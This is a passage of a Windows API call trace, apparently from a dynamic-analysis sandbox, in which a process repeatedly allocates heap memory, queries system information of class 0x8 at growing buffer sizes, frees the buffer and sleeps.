ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.679] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.679] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.700] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.701] Sleep (dwMilliseconds=0x110) [0219.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.724] Sleep (dwMilliseconds=0x110) [0219.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.754] Sleep (dwMilliseconds=0x110) [0219.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.787] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.787] Sleep (dwMilliseconds=0x110) [0219.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.801] Sleep (dwMilliseconds=0x110) [0219.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.819] Sleep (dwMilliseconds=0x110) [0219.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.829] Sleep (dwMilliseconds=0x110) [0219.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.848] Sleep (dwMilliseconds=0x110) [0219.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.864] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.865] Sleep (dwMilliseconds=0x110) [0219.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.923] Sleep (dwMilliseconds=0x110) [0219.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.941] Sleep (dwMilliseconds=0x110) [0219.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.956] Sleep (dwMilliseconds=0x110) [0219.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.975] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0219.975] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.976] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0219.976] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.977] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0219.977] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0219.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0219.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0219.984] Sleep (dwMilliseconds=0x110) [0219.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0219.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0219.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.005] Sleep (dwMilliseconds=0x110) [0220.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 